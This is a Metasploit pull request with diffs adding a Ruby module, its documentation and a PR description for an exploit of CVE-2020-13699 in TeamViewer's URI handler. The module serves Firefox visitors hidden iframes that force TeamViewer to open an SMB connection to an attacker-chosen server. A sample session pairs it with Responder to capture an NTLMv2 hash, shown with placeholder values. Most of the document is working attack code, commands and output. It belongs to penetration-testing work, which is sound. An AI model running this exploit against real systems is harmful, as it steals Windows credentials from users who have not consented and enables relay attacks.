### PR TITLE
TeamViewer URI SMB exploit (CVE-2020-13699)

### DIFF
--- a/documentation/modules/auxiliary/server/teamviewer_uri_smb_redirect.md
+++ b/documentation/modules/auxiliary/server/teamviewer_uri_smb_redirect.md
@@ -12,7 +12,7 @@ Only Firefox can be exploited by this
 vulnerability, as all other browsers encode the space after 'play'
 and before the SMB location, preventing successful exploitation.
 
-Teamviewer 15.4.4445 was succssfully tested against.
+Teamviewer 15.4.4445, and 8.0.16642 were successfully tested against.
 
 ## Verification Steps
 
@@ -29,7 +29,7 @@ Teamviewer 15.4.4445 was succssfully tested against.
 
 ### FILE_NAME
 
-The SMB file to link to.  This is an arbitrary file name.  Default is `\\teamviewer\\config.tv`
+The SMB file to link to.  This is an arbitrary file name.  Default is `\\teamviewer\\config.tvs`
 
 ### SMB_SERVER
 

--- a/documentation/modules/auxiliary/server/teamviewer_uri_smb_redirect.md
+++ b/documentation/modules/auxiliary/server/teamviewer_uri_smb_redirect.md
@@ -1,0 +1,126 @@
+## Vulnerable Application
+
+This module exploits an unquoted parameter call within the
+Teamviewer URI handler to create an SMB connection to an attacker
+controlled IP.
+
+TeamViewer < 8.0.258861, 9.0.258860, 10.0.258873,
+11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and
+15.8.3 are vulnerable.
+
+Only Firefox can be exploited by this
+vulnerability, as all other browsers encode the space after 'play'
+and before the SMB location, preventing successful exploitation.
+
+Teamviewer 15.4.4445 was succssfully tested against.
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/server/teamviewer_uri_smb_redirect`
+1. Do: `set SMB_SERVER [IP]`
+1. Do: `run`
+1. Start an SMB Capture or Relay server (such as responder)
+1. Open the URL on the target
+1. The SMB Server should receive a connection.
+
+## Options
+
+### FILE_NAME
+
+The SMB file to link to.  This is an arbitrary file name.  Default is `\\teamviewer\\config.tv`
+
+### SMB_SERVER
+
+The SMB server IP address.
+
+### URI_HANDLER
+
+The URI Handler to use.  Typically the default `teamviewer10`
+
+## Scenarios
+
+### TeamViewer 15.4.4445 on Windows 10 1909 with Firefox 79
+
+```
+[*] Processing teamviewer.rb for ERB directives.
+resource (teamviewer.rb)> use auxiliary/server/teamviewer_uri_smb_redirect
+resource (teamviewer.rb)> set smb_server 2.2.2.2
+smb_server => 2.2.2.2
+resource (teamviewer.rb)> run -j
+[*] Auxiliary module running as background job 0.
+[+] Please start an SMB capture/relay on 2.2.2.2
+[*] Using URL: http://0.0.0.0:8080/IDGynsGNfXD5eFB
+[*] Local IP: http://1.1.1.1:8080/IDGynsGNfXD5eFB
+[*] Server started.
+```
+
+Start the SMB replay/capture
+
+```
+resource (teamviewer.rb)> sudo responder -I wlan0
+[*] exec: sudo responder -I wlan0
+
+                                         __
+  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
+  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
+  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
+                   |__|
+
+           NBT-NS, LLMNR & MDNS Responder 3.0.0.0
+
+  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
+  To kill this script hit CTRL-C
+
+
+[+] Poisoners:
+    LLMNR                      [ON]
+    NBT-NS                     [ON]
+    DNS/MDNS                   [ON]
+
+[+] Servers:
+    HTTP server                [ON]
+    HTTPS server               [ON]
+    WPAD proxy                 [OFF]
+    Auth proxy                 [OFF]
+    SMB server                 [ON]
+    Kerberos server            [ON]
+    SQL server                 [ON]
+    FTP server                 [ON]
+    IMAP server                [ON]
+    POP3 server                [ON]
+    SMTP server                [ON]
+    DNS server                 [ON]
+    LDAP server                [ON]
+    RDP server                 [ON]
+
+[+] HTTP Options:
+    Always serving EXE         [OFF]
+    Serving EXE                [OFF]
+    Serving HTML               [OFF]
+    Upstream Proxy             [OFF]
+
+[+] Poisoning Options:
+    Analyze Mode               [OFF]
+    Force WPAD auth            [OFF]
+    Force Basic Auth           [OFF]
+    Force LM downgrade         [OFF]
+    Fingerprint hosts          [OFF]
+
+[+] Generic Options:
+    Responder NIC              [wlan0]
+    Responder IP               [2.2.2.2]
+    Challenge set              [random]
+    Don't Respond To Names     ['ISATAP']
+
+
+
+[!] Error starting TCP server on port 80, check permissions or other servers running.
+[+] Listening for events...
+[*] Request received for: /IDGynsGNfXD5eFB
+[*] Sending TeamViewer Link to Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0...
+[SMB] NTLMv2-SSP Client   : 3.3.3.3
+[SMB] NTLMv2-SSP Username : DESKTOP\h00die
+[SMB] NTLMv2-SSP Hash     : h00die::DESKTOP:1111111111111111:11111111111111111111111111111111:000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+```

--- a/modules/auxiliary/server/teamviewer_uri_smb_redirect.rb
+++ b/modules/auxiliary/server/teamviewer_uri_smb_redirect.rb
@@ -79,7 +79,7 @@ class MetasploitModule < Msf::Auxiliary
       return
     end
 
-    print_status("Sending TeamViewer Link to #{req.headers['User-Agent']}...")
+    print_status("Sending TeamViewer Link to #{ua}...")
     send_response_html(cli, html_content)
   end
 

--- a/modules/auxiliary/server/teamviewer_uri_smb_redirect.rb
+++ b/modules/auxiliary/server/teamviewer_uri_smb_redirect.rb
@@ -1,0 +1,92 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'TeamViewer Unquoted URI Handler SMB Redirect',
+        'Description' => %q{
+          This module exploits an unquoted parameter call within the Teamviewer
+          URI handler to create an SMB connection to an attacker controlled IP.
+          TeamViewer < 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870,
+          12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3 are
+          vulnerable.
+          Only Firefox can be exploited by this vulnerability, as all other
+          browsers encode the space after 'play' and before the SMB location,
+          preventing successful exploitation.
+          Teamviewer 15.4.4445 was succssfully tested against.
+        },
+        'Author' =>
+          [
+            'Jeffrey Hofmann <me@jeffs.sh>', # Vuln discovery, PoC, etc
+            'h00die' # msf module
+          ],
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
+            [ 'URL', 'https://jeffs.sh/CVEs/CVE-2020-13699.txt' ],
+            [ 'CVE', '2020-13699' ],
+            [ 'URL', 'https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448' ]
+          ],
+        'Notes' => {
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('FILE_NAME', [false, 'Arbitrary tv file location', '\\teamviewer\\config.tvs']),
+        OptString.new('SMB_SERVER', [true, 'SMB server IP address', '']),
+        OptEnum.new('URI_HANDLER', [
+          true, 'TeamViewer URI Handler', 'teamviewer10', [
+            'teamviewer10',
+            'teamviewer8', 'teamviewerapi', 'tvchat1', 'tvcontrol1', 'tvfiletransfer1', 'tvjoinv8',
+            'tvpresent1', 'tvsendfile1', 'tvsqcustomer1', 'tvsqsupport1', 'tvvideocall1', 'tvvpn1'
+          ]
+        ])
+      ]
+    )
+  end
+
+  def firefox?(user_agent)
+    user_agent.include?('Firefox')
+  end
+
+  def html_content
+    # For some reason, tends to work best when double iframes.  Single will pop up the 'open app' message, but tends to not connect.
+    %(
+    <html>
+    <head></head>
+    <body>
+      <iframe style="height:1px;width:1px;" src="#{datastore['URI_HANDLER']}: --play \\\\#{datastore['SMB_SERVER']}#{datastore['FILE_NAME']}"></iframe>
+      <iframe style="height:1px;width:1px;" src="#{datastore['URI_HANDLER']}: --play \\\\#{datastore['SMB_SERVER']}#{datastore['FILE_NAME']}"></iframe>
+    </body>
+    </html>
+    )
+  end
+
+  def on_request_uri(cli, req)
+    print_status("Request received for: #{req.uri}")
+
+    unless firefox?(req.headers['User-Agent'])
+      print_error('Target is not Firefox')
+      return
+    end
+
+    print_status("Sending TeamViewer Link to #{req.headers['User-Agent']}...")
+    send_response_html(cli, html_content)
+  end
+
+  def run
+    print_good("Please start an SMB capture/relay on #{datastore['SMB_SERVER']}")
+    exploit
+  end
+end

--- a/modules/auxiliary/server/teamviewer_uri_smb_redirect.rb
+++ b/modules/auxiliary/server/teamviewer_uri_smb_redirect.rb
@@ -56,10 +56,6 @@ class MetasploitModule < Msf::Auxiliary
     )
   end
 
-  def firefox?(user_agent)
-    user_agent.include?('Firefox')
-  end
-
   def html_content
     # For some reason, tends to work best when double iframes.  Single will pop up the 'open app' message, but tends to not connect.
     %(
@@ -76,7 +72,9 @@ class MetasploitModule < Msf::Auxiliary
   def on_request_uri(cli, req)
     print_status("Request received for: #{req.uri}")
 
-    unless firefox?(req.headers['User-Agent'])
+    ua = req.headers['User-Agent'].to_s
+
+    unless ua.include?('Firefox')
       print_error('Target is not Firefox')
       return
     end

--- a/modules/auxiliary/server/teamviewer_uri_smb_redirect.rb
+++ b/modules/auxiliary/server/teamviewer_uri_smb_redirect.rb
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Auxiliary
           Only Firefox can be exploited by this vulnerability, as all other
           browsers encode the space after 'play' and before the SMB location,
           preventing successful exploitation.
-          Teamviewer 15.4.4445 was succssfully tested against.
+          Teamviewer 15.4.4445, and 8.0.16642 were succssfully tested against.
         },
         'Author' =>
           [


### PR DESCRIPTION
This adds an HTTP server which responds to Firefox (all other browsers aren't exploitable) with an iframe that will force TeamViewer to create an SMB connection to a server of our choice.  Exploits CVE-2020-13699.  This is an unbelievably simple exploit.
I can provide the Teamviewer 15.4.4445 installer binary if needed.

## Verification

- [ ]  Install the application
- [ ] Start msfconsole
- [ ] Do: `use auxiliary/server/teamviewer_uri_smb_redirect`
- [ ] Do: `set SMB_SERVER [IP]`
- [ ] Do: `run`
- [ ] Start an SMB Capture or Relay server (such as responder)
- [ ] Open the URL on the target
- [ ] The SMB Server should receive a connection.

@jeffssh FYI.

I also wanted to note I emailed @jeffssh about this exploit with a question.  They answered back immediately and were super nice answering my questions, so just wanted to say thanks and show appreciation!